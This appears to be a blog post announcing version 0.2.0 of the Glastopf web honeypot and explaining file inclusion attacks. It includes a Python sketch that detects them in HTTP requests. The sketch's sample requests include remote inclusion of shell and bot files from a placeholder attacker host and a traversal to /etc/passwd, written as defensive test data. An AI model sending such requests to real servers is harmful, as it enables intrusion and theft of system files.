Glastopf Webhoneypot Version 0.2.0
Lukas from Glasblog released a new version of his webhoneypot called Glastopf yesterday. Several new modules have been implemented including a Twitter and an IRC module to log current statistics and attack information. A complete changeset can be found here.
A web honeypot can be used to detect remote and local file inclusion attacks against current web applications, such as phpMyAdmin or the Roundcube webmailer. The honeypot simulates several vulnerable web applications and extracts injected commands from the incoming requests. A request may try to load a file from a remote server that is already under the attacker's control and execute it in the context of the web server. In some cases these remotely loaded files contain IRC bots that allow the attacker to take control of the attacked system. Other methods of compromising the system include gathering information about the running operating system and then including a local root exploit to take complete control of the server.
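The extraction step described above can be sketched as follows. This is an added example, not Glastopf's own code: the function name `extract_inclusions`, the patterns, and the sample request lines (including the placeholder host `attacker.example`) are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote

# Constructed sample request lines (not real traffic); hosts and paths are placeholders.
SAMPLE_REQUESTS = [
    "GET /phpmyadmin/index.php?lang=en HTTP/1.1",
    "GET /index.php?page=http://attacker.example/shell.txt HTTP/1.1",
    "GET /roundcube/index.php?_task=..%252F..%252F..%252Fetc%252Fpasswd HTTP/1.1",
    "GET /view.php?file=hTTps%3A%2F%2Fattacker.example%2Fbot.txt HTTP/1.1",
]

# A parameter value that is itself a URL suggests remote file inclusion (RFI).
REMOTE_URL = re.compile(r"^(?:https?|ftp)://[^\s/?#]+", re.IGNORECASE)
# Directory traversal in a parameter value suggests local file inclusion (LFI).
TRAVERSAL = re.compile(r"\.\.[/\\]")


def extract_inclusions(request_line):
    """Return (kind, parameter, decoded_value) findings for one HTTP request line."""
    try:
        _method, target, _version = request_line.split(" ", 2)
    except ValueError:
        return []  # malformed request line: nothing to extract
    query = target.partition("?")[2]
    findings = []
    for name, value in parse_qsl(query, keep_blank_values=True):
        # parse_qsl decodes once; decode a second time to catch double encoding.
        value = unquote(value)
        if REMOTE_URL.match(value):
            findings.append(("rfi", name, value))
        elif TRAVERSAL.search(value):
            findings.append(("lfi", name, value))
    return findings


if __name__ == "__main__":
    for line in SAMPLE_REQUESTS:
        for kind, name, value in extract_inclusions(line):
            # A honeypot would log the value and queue RFI URLs for analysis.
            print(f"{kind.upper()} via parameter {name!r}: {value}")
```

The extracted RFI URLs are what a honeypot operator would record and analyse, since they point at the server hosting the attacker's payload.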